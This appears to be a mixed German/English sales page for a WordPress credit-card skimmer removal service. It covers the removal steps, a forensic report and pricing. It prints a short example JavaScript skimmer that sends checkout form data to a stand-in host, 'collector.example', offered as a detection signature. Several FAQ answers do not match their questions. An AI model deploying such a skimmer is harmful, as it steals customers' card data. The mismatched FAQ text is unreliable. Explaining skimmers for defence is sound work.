Woran erkenne ich, dass meine WordPress-Seite gehackt ist?

Fast immer durch ein verwundbares Plugin oder ein gestohlenes Admin-Passwort. Der Angreifer platziert ein kleines JavaScript auf Ihrer Checkout-Seite, das Kartennummern still mitliest, während Kunden sie eingeben.

Sind meine Kunden jetzt sicher, da der Skimmer entfernt ist?

Going forward, yes. Cards entered while the skimmer was running need to be considered compromised. I include the timeline in my report so you can notify affected customers and your payment processor.

Muss ich meinen Admin-Login herausgeben?

Die meisten Kartenmarken verlangen die Meldung eines Kartendaten-Vorfalls. Unser Bericht ist so verfasst, dass Sie ihn direkt an Ihren Acquirer oder Versicherer weitergeben können — ohne weitere Übersetzung.

Wird Google meiner Seite wieder vertrauen?

Häufig ja. Wir reichen als Teil jeder Bereinigung einen Safe-Browsing-Reconsideration-Antrag ein und beantragen die Neuindexierung in der Search Console, sobald der Skimmer entfernt ist.

// PHARMA-HACK · WORDPRESS · BEREINIGT

WordPress credit card skimmer removal.

Manual removal of the card skimmer. I find the entry point and write a report your acquirer can read. Flat $279.

Bereinigung starten → Wie Karten-Skimmer funktionieren

§ 01 — MECHANISMUS

Wenige Zeilen JavaScript reichen, um jede Bestellung zu stehlen.

Ein Karten-Skimmer ist ein winziges JavaScript, das Ihr Checkout-Formular abhört. Sobald ein Kunde die Kartennummer eintippt, erstellt der Skimmer eine Kopie und schickt sie an eine vom Angreifer kontrollierte Adresse — meist einen von außen unscheinbar wirkenden Server.

Die Seite funktioniert weiter. Die Bestellung läuft durch. Weder Kunde noch Sie merken etwas. Wir spielen die Bestellung in einer Sandbox nach, verfolgen das Skript bis zu seinem Ort in Ihrer Seite und entfernen es, ohne den restlichen Checkout zu beschädigen.

// grobe Form eines Checkout-Skimmers

01 document.querySelector('form.checkout').addEventListener('submit', function (e) {
02   const data = new FormData(e.target);
03   fetch('https://collector.example/c', {
04     method: 'POST', body: data, mode: 'no-cors'
05   });
06 });
07
08 // A fetch to an external host on form submit is the signature.

§ 02 — WAS WIR ENTFERNEN

Jeden Ort, an dem sich diese Infektion versteckt.

[ PLUGIN-TRIAGE ]

Wir geben in einer Sandbox eine Testbestellung auf und überwachen jeden Netzwerkaufruf des Checkouts.
[ JAVASCRIPT ]

Theme-Dateien, Plugin-Assets und Inline-Skripte geprüft. Alles, was Formulardaten extern sendet — entfernt.
[ DATENBANK ]

Eingeschleuste Skripte in wp_options, wp_posts und aktiven Widgets — gelöscht. Persistenz beseitigt.
[ LEISTUNGEN ]

PHP-Backdoors, die den Skimmer neu installieren, aufgespürt. Cron-Jobs und Must-Use-Plugins überprüft.
[ ZEITVERLAUF ]

Erste und letzte Sichtungsdaten erfasst, damit Sie wissen, welche Bestellungen betroffen waren.
[ BERICHT ]

Forensischer Bericht in Klartext, geeignet für Kunden, Versicherer oder die eigenen Akten.

§ PREISE

Pauschal $279. Einmalig. Pro Seite.

[ RESCUE ]

$279

PAUSCHAL · EINMALIG · PRO SEITE

Manual cleanup, entry-vector identification, written forensic report.

Bereinigung starten →

[ SHIELD ]

$29 / mo

PRO SEITE · JEDERZEIT KÜNDBAR

Laufendes Monitoring, Absicherung, eine Bereinigung pro Jahr inklusive.

Schützen lassen →

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Alle Leistungen ansehen →

Start an engagement.

Send the scope, stack, and timeline. You get a written proposal with a fixed quote.

Kontakt →